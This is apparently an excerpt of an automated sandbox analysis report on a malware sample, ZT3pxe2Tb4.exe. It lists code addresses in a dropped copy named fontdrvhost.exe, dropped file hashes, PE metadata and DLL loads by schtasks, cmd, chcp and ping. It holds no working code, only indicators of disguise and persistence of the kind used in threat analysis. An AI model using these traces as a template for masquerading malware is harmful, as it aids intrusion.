Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4CF2 8_2_00007FFD9BBB4CF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB6C80 8_2_00007FFD9BBB6C80
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2B7ED 9_2_00007FFD9BA2B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA10DA8 9_2_00007FFD9BA10DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA1F562 9_2_00007FFD9BA1F562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA69EB8 9_2_00007FFD9BA69EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2D344 9_2_00007FFD9BA2D344
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BA20DA8 14_2_00007FFD9BA20DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBD09BE 14_2_00007FFD9BBD09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBD000A 14_2_00007FFD9BBD000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBE3600 14_2_00007FFD9BBE3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9C1078B0 14_2_00007FFD9C1078B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0B7ED 21_2_00007FFD9BA0B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9B9F0DA8 21_2_00007FFD9B9F0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9B9FF562 21_2_00007FFD9B9FF562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA49EB8 21_2_00007FFD9BA49EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBA09BE 21_2_00007FFD9BBA09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB4978 21_2_00007FFD9BBB4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBA000A 21_2_00007FFD9BBA000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB3600 21_2_00007FFD9BBB3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB34F3 21_2_00007FFD9BBB34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC2C24 21_2_00007FFD9BBC2C24
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC13D8 21_2_00007FFD9BBC13D8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC16F2 21_2_00007FFD9BBC16F2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC82C8 21_2_00007FFD9BBC82C8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0FE8A1 21_2_00007FFD9C0FE8A1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0DB66F 21_2_00007FFD9C0DB66F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10B9CA 21_2_00007FFD9C10B9CA
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10CE22 21_2_00007FFD9C10CE22
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10B24D 21_2_00007FFD9C10B24D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0D344 21_2_00007FFD9BA0D344
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BA00DA8 27_2_00007FFD9BA00DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC5A00 27_2_00007FFD9BBC5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBB09BE 27_2_00007FFD9BBB09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4978 27_2_00007FFD9BBC4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBB000A 27_2_00007FFD9BBB000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4F4F 27_2_00007FFD9BBC4F4F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC3600 27_2_00007FFD9BBC3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC55D4 27_2_00007FFD9BBC55D4
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4D2F 27_2_00007FFD9BBC4D2F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC34F3 27_2_00007FFD9BBC34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4D0F 27_2_00007FFD9BBC4D0F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4C9F 27_2_00007FFD9BBC4C9F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC6C80 27_2_00007FFD9BBC6C80
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9C0E78B0 27_2_00007FFD9C0E78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9C0E3518 27_2_00007FFD9C0E3518
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9B9E0DA8 34_2_00007FFD9B9E0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4BF2 34_2_00007FFD9BBA4BF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA5A00 34_2_00007FFD9BBA5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BB909BE 34_2_00007FFD9BB909BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4978 34_2_00007FFD9BBA4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA5E82 34_2_00007FFD9BBA5E82
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA3600 34_2_00007FFD9BBA3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA55D3 34_2_00007FFD9BBA55D3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4CF2 34_2_00007FFD9BBA4CF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA34F3 34_2_00007FFD9BBA34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9C0C78B0 34_2_00007FFD9C0C78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2B7ED 35_2_00007FFD9BA2B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA1F562 35_2_00007FFD9BA1F562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA10DA8 35_2_00007FFD9BA10DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA69EB8 35_2_00007FFD9BA69EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBC09BE 35_2_00007FFD9BBC09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4978 35_2_00007FFD9BBD4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBC000A 35_2_00007FFD9BBC000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD3600 35_2_00007FFD9BBD3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4D31 35_2_00007FFD9BBD4D31
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4D12 35_2_00007FFD9BBD4D12
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4CA1 35_2_00007FFD9BBD4CA1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE23E0 35_2_00007FFD9BBE23E0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE13D8 35_2_00007FFD9BBE13D8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE23CF 35_2_00007FFD9BBE23CF
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE82E1 35_2_00007FFD9BBE82E1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE16F2 35_2_00007FFD9BBE16F2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C0F78B0 35_2_00007FFD9C0F78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C0FB66F 35_2_00007FFD9C0FB66F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12B9CA 35_2_00007FFD9C12B9CA
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12CE22 35_2_00007FFD9C12CE22
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12B24D 35_2_00007FFD9C12B24D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C11E8A1 35_2_00007FFD9C11E8A1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2D344 35_2_00007FFD9BA2D344
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AFOsBjYP.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AaPSReOe.log F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
Source: DnshUSLJ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: tAOrkGQb.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SKewgrff.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IbKgwPay.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zsrQNmVQ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pJXAdKPi.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ZT3pxe2Tb4.exe
Source: ZT3pxe2Tb4.exe, 00000000.00000000.1607054032.0000000000D64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
Source: ZT3pxe2Tb4.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
